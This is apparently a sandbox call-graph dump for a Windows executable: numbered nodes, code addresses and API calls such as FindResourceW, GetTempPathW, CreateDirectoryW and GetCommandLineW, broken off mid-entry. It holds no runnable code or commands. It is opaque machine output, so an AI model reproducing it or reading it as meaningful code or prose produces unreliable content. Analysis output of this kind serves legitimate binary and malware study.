9332->9341 9333 140004ca6 9342 14000db18 17 API calls 9333->9342 9334 140004d48 10016 1400121c0 GetLastError TlsGetValue SetLastError 9334->10016 9335->9380 9344 140004c63 9336->9344 9345 140004e9a 9337->9345 9339 140004da5 10018 1400121c0 GetLastError TlsGetValue SetLastError 9339->10018 9340 140004e44 10044 1400121c0 GetLastError TlsGetValue SetLastError 9340->10044 9341->9380 9350 140004cbc 9342->9350 9352 140012210 3 API calls 9344->9352 9981 1400125a0 TlsGetValue 9345->9981 9346 140004cff 9347 14000db18 17 API calls 9346->9347 9355 140004d15 9347->9355 9358 140012210 3 API calls 9350->9358 9351 140004d58 9359 14000db18 17 API calls 9351->9359 9352->9380 9354 140004ea5 9364 140012360 HeapFree 9354->9364 9360 140012210 3 API calls 9355->9360 9356 140004db5 10019 14000bc94 9356->10019 9357 140004e54 9362 14000daa8 5 API calls 9357->9362 9358->9380 9363 140004d6e 9359->9363 9360->9380 9366 140004e64 9362->9366 9367 140012210 3 API calls 9363->9367 9368 140004ec4 9364->9368 9370 140012210 3 API calls 9366->9370 9367->9380 9371 140012360 HeapFree 9368->9371 9369 140012210 3 API calls 9372 140004dea 9369->9372 9370->9299 9373 140004ed6 9371->9373 9374 1400124c0 wcscmp 9372->9374 9373->8535 9375 140004dff 9374->9375 9376 140004e21 9375->9376 9377 140004e08 9375->9377 9379 140002930 35 API calls 9376->9379 10040 140007364 9377->10040 9379->9380 9380->9299 9381->8539 9382->8541 9383->8543 9385 1400123e0 21 API calls 9384->9385 9386 140003cde 9385->9386 9387 1400122f0 2 API calls 9386->9387 9388 140003cfb 9387->9388 10053 1400121c0 GetLastError TlsGetValue SetLastError 9388->10053 9390 140003d2f 10054 1400121c0 GetLastError TlsGetValue SetLastError 9390->10054 9392 140003d43 9393 14000ca80 5 API calls 9392->9393 9394 140003d5f 9393->9394 9395 140012210 3 API calls 9394->9395 9396 140003d6e 9395->9396 10055 1400121c0 GetLastError TlsGetValue SetLastError 9396->10055 9398 140003d87 9399 140012450 4 API calls 9398->9399 9400 140003d96 9399->9400 10056 1400125a0 TlsGetValue 9400->10056 9402 140003da1 9403 140012360 HeapFree 9402->9403 9404 140003dc0 9403->9404 9405 140012360 HeapFree 9404->9405 9406 140003dd2 9405->9406 9407 140012520 TlsGetValue 9406->9407 9407->8547 9408->8549 9410 14000c468 SetEnvironmentVariableW 9409->9410 9411 14000c47c 9409->9411 9410->9411 9411->8551 9412->8553 9413->8561 9414->8563 9416 1400123e0 21 API calls 9415->9416 9417 1400026d1 9416->9417 10057 1400121c0 GetLastError TlsGetValue SetLastError 9417->10057 9419 1400026e5 10058 1400121c0 GetLastError TlsGetValue SetLastError 9419->10058 9421 1400026f9 9422 14000c0c4 5 API calls 9421->9422 9423 140002709 9422->9423 9424 140012210 3 API calls 9423->9424 9425 140002718 9424->9425 9426 1400027c0 9425->9426 9427 140002730 9425->9427 10126 1400121c0 GetLastError TlsGetValue SetLastError 9426->10126 10061 1400121c0 GetLastError TlsGetValue SetLastError 9427->10061 9430 14000273a 10062 1400121c0 GetLastError TlsGetValue SetLastError 9430->10062 9431 1400027cf 9433 140012450 4 API calls 9431->9433 9435 1400027de 9433->9435 9434 14000274a 10063 1400031f5 9434->10063 9437 140012210 3 API calls 9435->9437 9439 1400027be 9437->9439 10059 1400121c0 GetLastError TlsGetValue SetLastError 9439->10059 9440 140012210 3 API calls 9442 140002768 9440->9442 10125 1400121c0 GetLastError TlsGetValue SetLastError 9442->10125 9443 1400027fc 9445 140012450 4 API calls 9443->9445 9446 14000280b 9445->9446 10060 1400125a0 TlsGetValue 9446->10060 9447 140002777 9449 140012450 4 API calls 9447->9449 9451 140002786 9449->9451 9450 140002816 9454 140012360 HeapFree 9450->9454 9452 140012450 4 API calls 9451->9452 9453 14000279d 9452->9453 9455 140012450 4 API calls 9453->9455 9456 140002835 9454->9456 9457 1400027af 9455->9457 9458 140012360 HeapFree 9456->9458 9459 140012210 3 API calls 9457->9459 9460 140002847 9458->9460 9459->9439 9460->8566 9462 140004eeb 9461->9462 9462->9462 9463 1400123e0 21 API calls 9462->9463 9482 140004f05 9463->9482 9464 140004fdf 10150 1400121c0 GetLastError TlsGetValue SetLastError 9464->10150 9466 140004fe9 10151 1400121c0 GetLastError TlsGetValue SetLastError 9466->10151 9468 140004ffd 10152 1400121c0 GetLastError TlsGetValue SetLastError 9468->10152 9469 140007c90 3 API calls 9469->9482 9471 14000500d 10153 1400121c0 GetLastError TlsGetValue SetLastError 9471->10153 9472 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 9472->9482 9474 14000501d 9476 140010ba0 6 API calls 9474->9476 9475 1400121c0 GetLastError TlsGetValue SetLastError 9475->9482 9477 14000503b 9476->9477 10154 1400125d0 TlsGetValue 9477->10154 9478 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 9478->9482 9480 140005045 9481 140007dc0 6 API calls 9480->9481 9483 140005058 9481->9483 9482->9464 9482->9469 9482->9472 9482->9475 9482->9478 9484 140012210 3 API calls 9483->9484 9485 140005067 9484->9485 10155 1400121c0 GetLastError TlsGetValue SetLastError 9485->10155 9487 140005071 10156 1400121c0 GetLastError TlsGetValue SetLastError 9487->10156 9489 140005085 10157 1400121c0 GetLastError TlsGetValue SetLastError 9489->10157 9491 140005095 10158 1400121c0 GetLastError TlsGetValue SetLastError 9491->10158 9493 1400050a5 9494 140010ba0 6 API calls 9493->9494 9495 1400050c3 9494->9495 10159 1400125d0 TlsGetValue 9495->10159 9497 1400050cd 9498 140007dc0 6 API calls 9497->9498 9499 1400050e0 9498->9499 9500 140012210 3 API calls 9499->9500 9501 1400050ef 9500->9501 10160 1400121c0 GetLastError TlsGetValue SetLastError 9501->10160 9503 1400050f9 10161 1400121c0 GetLastError TlsGetValue SetLastError 9503->10161 9505 14000510d 10162 1400121c0 GetLastError TlsGetValue SetLastError 9505->10162 9507 14000511d 10163 1400121c0 GetLastError TlsGetValue SetLastError 9507->10163 9509 14000512d 9510 140010ba0 6 API calls 9509->9510 9511 140005149 9510->9511 10164 1400125d0 TlsGetValue 9511->10164 9513 140005153 9514 140007dc0 6 API calls 9513->9514 9515 140005166 9514->9515 9516 140012210 3 API calls 9515->9516 9517 140005175 9516->9517 10165 1400121c0 GetLastError TlsGetValue SetLastError 9517->10165 9519 14000517f 10166 1400121c0 GetLastError TlsGetValue SetLastError 9519->10166 9521 140005193 10167 1400121c0 GetLastError TlsGetValue SetLastError 9521->10167 9523 1400051a3 10168 1400121c0 GetLastError TlsGetValue SetLastError 9523->10168 9525 1400051b3 9526 140010ba0 6 API calls 9525->9526 9527 1400051d2 9526->9527 10169 1400125d0 TlsGetValue 9527->10169 9529 1400051dc 9530 140007dc0 6 API calls 9529->9530 9531 1400051ef 9530->9531 9532 140012210 3 API calls 9531->9532 9533 1400051fe 9532->9533 10170 1400121c0 GetLastError TlsGetValue SetLastError 9533->10170 9535 140005208 10171 1400121c0 GetLastError TlsGetValue SetLastError 9535->10171 9537 14000521c 10172 1400121c0 GetLastError TlsGetValue SetLastError 9537->10172 9539 14000522c 10173 1400121c0 GetLastError TlsGetValue SetLastError 9539->10173 9541 14000523c 9542 140010ba0 6 API calls 9541->9542 9543 14000525b 9542->9543 10174 1400125d0 TlsGetValue 9543->10174 9545 140005265 9546 140007dc0 6 API calls 9545->9546 9547 140005278 9546->9547 9548 140012210 3 API calls 9547->9548 9549 140005287 9548->9549 10175 1400121c0 GetLastError TlsGetValue SetLastError 9549->10175 9551 140005291 10176 1400121c0 GetLastError TlsGetValue SetLastError 9551->10176 9553 1400052a1 10177 140005794 9553->10177 9555 1400052be 10210 1400121c0 GetLastError TlsGetValue SetLastError 9555->10210 9557 1400052dc 10211 1400121c0 GetLastError TlsGetValue SetLastError 9557->10211 9559 1400052ec 9560 140005794 69 API calls 9559->9560 9561 140005306 9560->9561 9562 140012210 3 API calls 9561->9562 9563 140005317 9562->9563 10212 1400121c0 GetLastError TlsGetValue SetLastError 9563->10212 9565 140005321 10213 1400121c0 GetLastError TlsGetValue SetLastError 9565->10213 9567 140005331 9568 140005794 69 API calls 9567->9568 9569 14000534b 9568->9569 9570 140012210 3 API calls 9569->9570 9571 14000535a 9570->9571 10214 1400121c0 GetLastError TlsGetValue SetLastError 9571->10214 9573 140005364 10215 1400121c0 GetLastError TlsGetValue SetLastError 9573->10215 9575 140005374 9576 140005794 69 API calls 9575->9576 9577 14000538e 9576->9577 9578 140012210 3 API calls 9577->9578 9579 1400053a0 9578->9579 10216 1400121c0 GetLastError TlsGetValue SetLastError 9579->10216 9581 1400053aa 10217 1400121c0 GetLastError TlsGetValue SetLastError 9581->10217 9583 1400053ba 9584 140005794 69 API calls 9583->9584 9585 1400053d4 9584->9585 9586 140012210 3 API calls 9585->9586 9587 1400053e6 9586->9587 10218 1400121c0 GetLastError TlsGetValue SetLastError 9587->10218 9589 1400053f0 10219 1400121c0 GetLastError TlsGetValue SetLastError 9589->10219 9591 140005404 10220 1400121c0 GetLastError TlsGetValue SetLastError 9591->10220 9593 140005414 10221 1400121c0 GetLastError TlsGetValue SetLastError 9593->10221 9595 140005428 9596 140003cc9 37 API calls 9595->9596 9597 14000543e 9596->9597 10222 140012520 TlsGetValue 9597->10222 9599 140005447 10223 1400125d0 TlsGetValue 9599->10223 9601 14000545f 10224 1400081d0 9601->10224 9604 140012210 3 API calls 9605 140005486 9604->9605 10227 1400121c0 GetLastError TlsGetValue SetLastError 9605->10227 9607 140005490 10228 1400121c0 GetLastError TlsGetValue SetLastError 9607->10228 9609 1400054a4 10229 1400121c0 GetLastError TlsGetValue SetLastError 9609->10229 9611 1400054b4 10230 1400121c0 GetLastError TlsGetValue SetLastError 9611->10230 9613 1400054c8 9614 140003cc9 37 API calls 9613->9614 9615 1400054de 9614->9615 10231 140012520 TlsGetValue 9615->10231 9617 1400054e7 10232 1400125d0 TlsGetValue 9617->10232 9619 1400054ff 9620 1400081d0 13 API calls 9619->9620 9621 140005517 9620->9621 9622 140012210 3 API calls 9621->9622 9623 140005526 9622->9623 10233 1400121c0 GetLastError TlsGetValue SetLastError 9623->10233 9625 140005530 10234 1400121c0 GetLastError TlsGetValue SetLastError 9625->10234 9627 140005549 9628 140012450 4 API calls 9627->9628 9629 140005558 9628->9629 9630 140012450 4 API calls 9629->9630 9631 14000556f 9630->9631 9632 140012450 4 API calls 9631->9632 9633 140005584 9632->9633 9634 140012450 4 API calls 9633->9634 9635 140005599 9634->9635 9636 140012450 4 API calls 9635->9636 9637 1400055ae 9636->9637 10235 140012520 TlsGetValue 9637->10235 9639 1400055b7 10236 1400125d0 TlsGetValue 9639->10236 9641 1400055c3 10237 14000309a 9641->10237 9643 1400055d7 9644 140012360 HeapFree 9643->9644 9645 1400055fd 9644->9645 9646 140012360 HeapFree 9645->9646 9647 14000560f 9646->9647 9648 140012360 HeapFree 9647->9648 9649 140005621 9648->9649 9650 140012360 HeapFree 9649->9650 9651 140005633 9650->9651 9652 140012360 HeapFree 9651->9652 9653 140005648 9652->9653 9654 140012360 HeapFree 9653->9654 9655 14000565a 9654->9655 9656 140012360 HeapFree 9655->9656 9657 14000566f 9656->9657 9658 140012360 HeapFree 9657->9658 9659 140005681 9658->9659 9660 140012360 HeapFree 9659->9660 9661 140005693 9660->9661 9662 140012360 HeapFree 9661->9662 9663 1400056a5 9662->9663 9664 1400121c0 GetLastError TlsGetValue SetLastError 9663->9664 9664->8571 9665->8577 9666->8593 9667->8595 9668->8603 9669->8605 9670->8607 9672 1400126d0 3 API calls 9671->9672 9673 14000daca GetCurrentDirectoryW 9672->9673 9674 14000dae1 9673->9674 10405 140012900 TlsGetValue 9674->10405 9676 14000663c 9677 140012520 TlsGetValue 9676->9677 9677->8611 9678->8613 9679->8619 9680->8621 9681->8623 9683 1400029e1 9682->9683 9683->9683 9684 1400123e0 21 API calls 9683->9684 9685 1400029fb 9684->9685 9686 1400122f0 2 API calls 9685->9686 9687 140002a11 9686->9687 9688 1400122f0 2 API calls 9687->9688 9689 140002a2b 9688->9689 9690 1400122f0 2 API calls 9689->9690 9691 140002a45 9690->9691 9692 140007364 2 API calls 9691->9692 9694 140002af8 9691->9694 9693 140002ac7 GetExitCodeProcess 9692->9693 9693->9691 9695 140012360 HeapFree 9694->9695 9696 140002b18 9695->9696 9697 140012360 HeapFree 9696->9697 9698 140002b2a 9697->9698 9718 1400072c5 RtlEnterCriticalSection 9717->9718 9719 140006598 9717->9719 9722 140007309 9718->9722 9719->8591 9720 140007313 9724 140011cb0 RtlAllocateHeap 9720->9724 9721 1400072db WaitForSingleObject 9721->9722 9723 1400072ee CloseHandle 9721->9723 9722->9720 9722->9721 9725 140011c68 HeapFree 9723->9725 9726 140007336 RtlLeaveCriticalSection 9724->9726 9725->9722 9726->9719 9728 140003dea 9727->9728 9728->9728 9729 1400123e0 21 API calls 9728->9729 9730 140003e04 9729->9730 9731 1400122f0 2 API calls 9730->9731 9732 140003e17 9731->9732 9733 140003e6d 9732->9733 10432 1400121c0 GetLastError TlsGetValue SetLastError 9732->10432 10434 1400121c0 GetLastError TlsGetValue SetLastError 9733->10434 9736 140003e77 10435 1400121c0 GetLastError TlsGetValue SetLastError 9736->10435 9737 140003e30 10433 1400121c0 GetLastError TlsGetValue SetLastError 9737->10433 9740 140003e8b 10436 1400121c0 GetLastError TlsGetValue SetLastError 9740->10436 9741 140003e44 9743 14000ca00 4 API calls 9741->9743 9744 140003e5e 9743->9744 9746 140012210 3 API calls 9744->9746 9745 140003e9b 10437 1400121c0 GetLastError TlsGetValue SetLastError 9745->10437 9746->9733 9748 140003eab 9749 140010ba0 6 API calls 9748->9749 9750 140003ec7 9749->9750 10438 1400125d0 TlsGetValue 9750->10438 9752 140003ed1 9753 140007dc0 6 API calls 9752->9753 9754 140003ee4 9753->9754 9755 140012210 3 API calls 9754->9755 9756 140003ef3 FindResourceW 9755->9756 9757 140003f1c 9756->9757 9758 14000402d 9756->9758 9759 14000350f 21 API calls 9757->9759 9760 1400124c0 wcscmp 9758->9760 9761 140003f2d 9759->9761 9762 14000403c 9760->9762 9768 140001284 8 API calls 9761->9768 9763 140004067 9762->9763 9764 14000404c 9762->9764 9765 140004070 9762->9765 9769 140012360 HeapFree 9763->9769 9766 140007284 7 API calls 9764->9766 10443 140003592 9765->10443 9766->9763 9771 140003f66 9768->9771 9770 14000408e 9769->9770 9772 140012360 HeapFree 9770->9772 10439 1400121c0 GetLastError TlsGetValue SetLastError 9771->10439 9774 1400040a0 9772->9774 9774->8591 9775 140003f70 10440 1400121c0 GetLastError TlsGetValue SetLastError 9775->10440 9777 140003f84 9778 14000ca80 5 API calls 9777->9778 9779 140003fa1 9778->9779 9780 140012210 3 API calls 9779->9780 9781 140003fb2 9780->9781 10441 1400121c0 GetLastError TlsGetValue SetLastError 9781->10441 9783 140003fe3 10442 1400121c0 GetLastError TlsGetValue SetLastError 9783->10442 9785 140003ff7 9786 140007e50 5 API calls 9785->9786 9787 14000401c 9786->9787 9788 140012210 3 API calls 9787->9788 9788->9758 9790 140012351 9789->9790 9791 140012306 wcslen RtlAllocateHeap 9789->9791 9790->9002 9791->9790 9792->9006 9793->9008 9795 1400126d0 3 API calls 9794->9795 9796 140004868 9795->9796 9796->9011 9797->9014 9798->9018 9800 1400123e0 21 API calls 9799->9800 9801 140003527 9800->9801 9801->9041 9802->9054 9803->9061 9804->9053 9805->9058 9806->9062 9807->9065 9809 14000caa8 9808->9809 9811 14000ca00 9808->9811 9810 1400126d0 3 API calls 9809->9810 9814 14000cac5 9810->9814 9811->9811 9812 1400126d0 3 API calls 9811->9812 9813 14000ca34 9812->9813 9816 14000ca3b memcpy 9813->9816 9817 14000ca4c 9813->9817 9914 140012900 TlsGetValue 9814->9914 9816->9817 9817->9068 9818 14000caf1 9818->9068 9819->9072 9821 140007f00 9820->9821 9822 140012630 TlsGetValue 9821->9822 9823 140007fa9 9822->9823 9824 1400126d0 3 API calls 9823->9824 9825 140007fb7 9824->9825 9826 140002d0e 9825->9826 9915 140012850 TlsGetValue 9825->9915 9826->9078 9828->9082 9829->9084 9830->9086 9831->9088 9832->9092 9833->9098 9834->9100 9835->9102 9836->9104 9838 140007501 9837->9838 9839 140007644 TlsGetValue 9837->9839 9841 140007592 9838->9841 9843 140007560 wcsncmp 9838->9843 9839->9106 9842 140012630 TlsGetValue 9841->9842 9844 1400075a6 9842->9844 9843->9838 9845 1400075ca 9844->9845 9916 1400126a0 TlsGetValue 9844->9916 9847 1400126d0 3 API calls 9845->9847 9849 1400075d4 9847->9849 9848 1400075b9 memcpy 9848->9845 9850 1400075ee 9849->9850 9851 1400075e0 wcsncpy 9849->9851 9850->9106 9851->9850 9852->9108 9853->9110 9854->9112 9855->9116 9856->9118 9917 14000b5d8 9857->9917 9859 14000b790 9860 14000b5d8 2 API calls 9859->9860 9861 14000b79b 9860->9861 9862 14000b5d8 2 API calls 9861->9862 9863 14000b7a6 9862->9863 9864 14000b7b2 GetStockObject 9863->9864 9865 14000b7c3 LoadIconW LoadCursorW RegisterClassExW 9863->9865 9864->9865 9920 14000be5c GetForegroundWindow 9865->9920 9870 14000b859 IsWindowEnabled 9871 14000b87a 9870->9871 9872 14000b863 EnableWindow 9870->9872 9873 14000be5c 3 API calls 9871->9873 9872->9871 9874 14000b886 GetSystemMetrics GetSystemMetrics CreateWindowExW 9873->9874 9875 14000b902 6 API calls 9874->9875 9876 14000bb96 9874->9876 9878 14000ba12 SendMessageW wcslen wcslen SendMessageW 9875->9878 9879 14000ba53 CreateWindowExW SendMessageW CreateAcceleratorTableW SetForegroundWindow BringWindowToTop 9875->9879 9877 14000bba4 9876->9877 9934 140012810 TlsGetValue 9876->9934 9882 14000bba9 HeapFree 9877->9882 9883 14000bbbb 9877->9883 9878->9879 9880 14000bb48 9879->9880 9886 14000bb51 9880->9886 9887 14000bb0a GetMessageW 9880->9887 9882->9883 9884 14000bbd2 9883->9884 9885 14000bbc0 HeapFree 9883->9885 9889 14000bbd7 HeapFree 9884->9889 9890 140002e9b 9884->9890 9885->9884 9891 14000bb56 DestroyAcceleratorTable 9886->9891 9892 14000bb5f 9886->9892 9887->9886 9888 14000bb20 TranslateAcceleratorW 9887->9888 9888->9880 9893 14000bb34 TranslateMessage DispatchMessageW 9888->9893 9889->9890 9890->9121 9891->9892 9892->9876 9894 14000bb68 wcslen 9892->9894 9893->9880 9895 1400126d0 3 API calls 9894->9895 9896 14000bb77 wcscpy HeapFree 9895->9896 9896->9876 9897->9129 9898->9131 9899->9133 9900->9135 9901->9139 9902->9148 9903->9150 9904->9152 9905->9156 9906->9158 9908 14000be5c 3 API calls 9907->9908 9909 14000b596 9908->9909 9910 14000bf44 7 API calls 9909->9910 9911 14000b5a3 MessageBoxW 9910->9911 9912 14000bf44 7 API calls 9911->9912 9913 14000b5bf 9912->9913 9913->9160 9914->9818 9915->9826 9916->9848 9918 14000b5ea wcslen RtlAllocateHeap 9917->9918 9919 14000b60e 9917->9919 9918->9919 9919->9859 9921 14000b83f 9920->9921 9922 14000be76 GetWindowThreadProcessId GetCurrentProcessId 9920->9922 9923 14000bf44 9921->9923 9922->9921 9924 14000bf57 EnumWindows 9923->9924 9929 14000bfbb 9923->9929 9925 14000bf77 GetCurrentThreadId 9924->9925 9926 14000b84d 9924->9926 9928 14000bf85 9925->9928 9926->9870 9926->9871 9927 14000bfc7 GetCurrentThreadId 9927->9929 9928->9925 9928->9926 9930 14000bf8b SetWindowPos 9928->9930 9929->9926 9929->9927 9931 14000bfdb EnableWindow 9929->9931 9932 14000bff0 SetWindowPos 9929->9932 9935 140011c68 9929->9935 9930->9928 9931->9929 9932->9929 9934->9877 9936 140011c74 HeapFree 9935->9936 9938 14001f820 9936->9938 9939->9169 9940->9172 9942 1400126d0 3 API calls 9941->9942 9943 14000d9eb GetTempPathW LoadLibraryW 9942->9943 9944 14000da13 GetProcAddress 9943->9944 9945 14000da3e 9943->9945 9946 14000da35 FreeLibrary 9944->9946 9947 14000da28 GetLongPathNameW 9944->9947 9974 140012900 TlsGetValue 9945->9974 9946->9945 9947->9946 9949 140001f92 9949->9175 9950->9179 9951->9181 9953 14000ca20 9952->9953 9953->9953 9954 1400126d0 3 API calls 9953->9954 9955 14000ca34 9954->9955 9956 14000ca3b memcpy 9955->9956 9957 140001ff7 9955->9957 9956->9957 9957->9185 9959 14000da74 9958->9959 9960 140002014 9959->9960 9961 14000da92 DeleteFileW 9959->9961 9962 14000da87 SetFileAttributesW 9959->9962 9963 14000d914 9960->9963 9961->9960 9962->9961 9964 14000d924 wcsncpy wcslen 9963->9964 9965 140002020 GetTempFileNameW 9963->9965 9966 14000d98a CreateDirectoryW 9964->9966 9967 14000d95c 9964->9967 9968 1400121c0 GetLastError TlsGetValue SetLastError 9965->9968 9966->9965 9967->9966 9968->9192 9969->9194 9970->9204 9971->9206 9972->9214 9973->9216 9974->9949 9975->9231 9976->9234 9978 14000dc91 SetCurrentDirectoryW 9977->9978 9979 140006901 9977->9979 9978->9979 9979->9245 9980->9326 9981->9354 9982->9266 9983->9273 9984->9269 9985->9272 9986->9285 9988 1400126d0 3 API calls 9987->9988 9989 14000db3e 9988->9989 9990 14000db4a LoadLibraryW 9989->9990 9994 14000dbfb 9989->9994 9991 14000dbd5 9990->9991 9992 14000db5f GetProcAddress 9990->9992 10045 14000dca4 SHGetFolderLocation 9991->10045 9995 14000dbc4 FreeLibrary 9992->9995 9996 14000db7b 9992->9996 9998 14000dca4 4 API calls 9994->9998 9999 14000dc61 9994->9999 9995->9991 9995->9999 9996->9995 10002 14000db92 wcscpy wcscat wcslen CoTaskMemFree 9996->10002 9998->9999 10051 140012900 TlsGetValue 9999->10051 10001 140004aff 10001->9314 10002->9995 10003->9282 10004->9300 10005->9287 10006->9305 10007->9301 10008->9310 10009->9306 10010->9325 10011->9311 10012->9333 10013->9327 10014->9346 10015->9334 10016->9351 10017->9339 10018->9356 10020 14000bce1 memset LoadLibraryW 10019->10020 10021 14000bccf CoInitialize 10019->10021 10022 14000be22 10020->10022 10023 14000bd12 GetProcAddress GetProcAddress wcsncpy wcslen 10020->10023 10021->10020 10024 1400126d0 3 API calls 10022->10024 10027 14000bd73 10023->10027 10026 14000be2c 10024->10026 10025 14000be5c 3 API calls 10028 14000bd8b 10025->10028 10052 140012900 TlsGetValue 10026->10052 10027->10025 10029 14000bf44 7 API calls 10028->10029 10031 14000bdb8 10029->10031 10033 14000bf44 7 API calls 10031->10033 10032 140004dd7 10032->9369 10034 14000bdca 10033->10034 10035 14000be15 FreeLibrary 10034->10035 10036 1400126d0 3 API calls 10034->10036 10035->10022 10035->10026 10037 14000bddc CoTaskMemFree wcslen 10036->10037 10037->10035 10039 14000be10 10037->10039 10039->10035 10041 140007375 timeBeginPeriod 10040->10041 10042 14000738a Sleep 10040->10042 10041->10042 10043->9340 10044->9357 10046 14000dbe2 wcscat wcslen 10045->10046 10047 14000dcd7 SHGetPathFromIDListW 10045->10047 10046->9999 10048 14000dce9 wcslen 10047->10048 10049 14000dd0a CoTaskMemFree 10047->10049 10048->10049 10050 14000dcf8 10048->10050 10049->10046 10050->10049 10051->10001 10052->10032 10053->9390 10054->9392 10055->9398 10056->9402 10057->9419 10058->9421 10059->9443 10060->9450 10061->9430 10062->9434 10064 1400031fe 10063->10064 10064->10064 10065 1400123e0 21 API calls 10064->10065 10084 140003218 10065->10084 10066 1400032ff 10127 1400121c0 GetLastError TlsGetValue SetLastError 10066->10127 10068 140003309 10128 1400121c0 GetLastError TlsGetValue SetLastError 10068->10128 10069 1400121c0 GetLastError TlsGetValue SetLastError 10069->10084 10071 14000331d GetCommandLineW 10073 14000ca00 4 API calls 10071->10073 10072 140007c90 3 API calls 10072->10084 10074 140003343 10073->10074 10076 140012210 3 API calls 10074->10076 10075 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 10075->10084 10077 140003352 10076->10077 10129 1400121c0 GetLastError TlsGetValue SetLastError 10077->10129 10079 140003361 10081 140012450 4 API calls 10079->10081 10080 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 10080->10084 10082 140003370 10081->10082 10083 140012210 3 API calls 10082->10083 10085 14000337f PathRemoveArgsW 10083->10085 10084->10066 10084->10069 10084->10072 10084->10075 10084->10080 10086 14000339d 10085->10086 10087 140003464 10086->10087 10130 1400121c0 GetLastError TlsGetValue SetLastError 10086->10130 10089 14000c45c SetEnvironmentVariableW 10087->10089 10091 140003473 10089->10091 10090 1400033ba 10092 140012450 4 API calls 10090->10092 10146 1400121c0 GetLastError TlsGetValue SetLastError 10091->10146 10094 1400033d3 10092->10094 10131 1400121c0 GetLastError TlsGetValue SetLastError 10094->10131 10095 140003482 10097 140012450 4 API calls 10095->10097 10099 140003491 10097->10099 10098 1400033e1 10132 1400121c0 GetLastError TlsGetValue SetLastError 10098->10132 10147 1400125a0 TlsGetValue 10099->10147 10102 1400033f1 10133 1400121c0 GetLastError TlsGetValue SetLastError 10102->10133 10103 14000349c 10105 140012360 HeapFree 10103->10105 10107 1400034bb 10105->10107 10106 140003401 10134 1400121c0 GetLastError TlsGetValue SetLastError 10106->10134 10109 140012360 HeapFree 10107->10109 10111 1400034cd 10109->10111 10110 140003411 10135 140008010 10110->10135 10114 140012360 HeapFree 10111->10114 10116 1400034df 10114->10116 10118 140012360 HeapFree 10116->10118 10117 140003441 10119 140007ef0 5 API calls 10117->10119 10120 1400034f1 10118->10120 10121 140003454 10119->10121 10122 140012360 HeapFree 10120->10122 10123 140012210 3 API calls 10121->10123 10124 140002759 10122->10124 10123->10087 10124->9440 10125->9447 10126->9431 10127->10068 10128->10071 10129->10079 10130->10090 10131->10098 10132->10102 10133->10106 10134->10110 10136 140008018 10135->10136 10136->10136 10137 140012630 TlsGetValue 10136->10137 10138 140008082 10137->10138 10139 1400126d0 3 API calls 10138->10139 10140 14000808e 10139->10140 10143 14000809e 10140->10143 10148 140012850 TlsGetValue 10140->10148 10149 140012900 TlsGetValue 10143->10149 10144 140003437 10145 1400125d0 TlsGetValue 10144->10145 10145->10117 10146->10095 10147->10103 10148->10143 10149->10144 10150->9466 10151->9468 10152->9471 10153->9474 10154->9480 10155->9487 10156->9489 10157->9491 10158->9493 10159->9497 10160->9503 10161->9505 10162->9507 10163->9509 10164->9513 10165->9519 10166->9521 10167->9523 10168->9525 10169->9529 10170->9535 10171->9537 10172->9539 10173->9541 10174->9545 10175->9551 10176->9553 10178 1400123e0 21 API calls 10177->10178 10179 1400057b1 10178->10179 10180 1400122f0 2 API calls 10179->10180 10181 1400057d1 FindResourceW 10180->10181 10182 1400057fe 10181->10182 10209 1400058cc 10181->10209 10183 14000350f 21 API calls 10182->10183 10186 14000580f 10183->10186 10185 1400058e5 10187 140012450 4 API calls 10185->10187 10250 140001284 10186->10250 10188 1400058f4 10187->10188 10298 1400125a0 TlsGetValue 10188->10298 10192 1400058ff 10195 140012360 HeapFree 10192->10195 10193 140005853 10270 140006960 10193->10270 10194 14000587b 10285 1400121c0 GetLastError TlsGetValue SetLastError 10194->10285 10198 14000591e 10195->10198 10200 140012360 HeapFree 10198->10200 10199 140005885 10286 1400121c0 GetLastError TlsGetValue SetLastError 10199->10286 10202 140005930 10200->10202 10202->9555 10203 140005899 10287 14000cb60 10203->10287 10205 14000586c 10299 140012600 TlsGetValue 10205->10299 10208 140012210 3 API calls 10208->10209 10297 1400121c0 GetLastError TlsGetValue SetLastError 10209->10297 10210->9557 10211->9559 10212->9565 10213->9567 10214->9573 10215->9575 10216->9581 10217->9583 10218->9589 10219->9591 10220->9593 10221->9595 10222->9599 10223->9601 10373 140008260 10224->10373 10227->9607 10228->9609 10229->9611 10230->9613 10231->9617 10232->9619 10233->9625 10234->9627 10235->9639 10236->9641 10238 1400122f0 2 API calls 10237->10238 10239 1400030c5 10238->10239 10240 1400122f0 2 API calls 10239->10240 10242 1400030dc 10240->10242 10241 140003122 10246 140012360 HeapFree 10241->10246 10242->10241 10402 14000e500 10242->10402 10245 14000dd30 11 API calls 10245->10241 10247 140003156 10246->10247 10248 140012360 HeapFree 10247->10248 10249 140003168 10248->10249 10249->9643 10251 14000129f 10250->10251 10251->10251 10252 1400122f0 2 API calls 10251->10252 10253 1400012ca 10252->10253 10300 1400073a0 WideCharToMultiByte 10253->10300 10255 1400012d8 10256 140011d30 4 API calls 10255->10256 10257 14000131b 10256->10257 10258 140011d30 4 API calls 10257->10258 10259 14000134f 10258->10259 10260 140011d30 4 API calls 10259->10260 10261 140001699 10260->10261 10262 140011d30 4 API calls 10261->10262 10263 1400016cd 10262->10263 10264 140012360 HeapFree 10263->10264 10265 1400016ff 10264->10265 10266 140011ef4 2 API calls 10265->10266 10267 140001711 10266->10267 10268 140011ef4 2 API calls 10267->10268 10269 140001723 10268->10269 10269->10193 10269->10194 10271 1400123e0 21 API calls 10270->10271 10272 140006982 10271->10272 10273 1400122f0 2 API calls 10272->10273 10274 140006995 10273->10274 10276 1400069b0 10274->10276 10304 140003174 10274->10304 10284 1400069c6 10276->10284 10311 14000e0a0 10276->10311 10278 140012360 HeapFree 10280 140006a4c 10278->10280 10279 1400069d8 10281 140006a04 10279->10281 10279->10284 10321 14000e590 10279->10321 10280->10205 10330 14000dd30 10281->10330 10284->10278 10285->10199 10286->10203 10288 14000cb92 10287->10288 10292 14000cbea 10287->10292 10289 1400126d0 3 API calls 10288->10289 10290 14000cbb4 10289->10290 10372 140012900 TlsGetValue 10290->10372 10291 14000cc44 MultiByteToWideChar 10295 1400126d0 3 API calls 10291->10295 10292->10291 10294 1400058bd 10294->10208 10296 14000cc6a MultiByteToWideChar 10295->10296 10296->10294 10297->10185 10298->10192 10299->10192 10301 1400073f2 10300->10301 10302 140007424 10301->10302 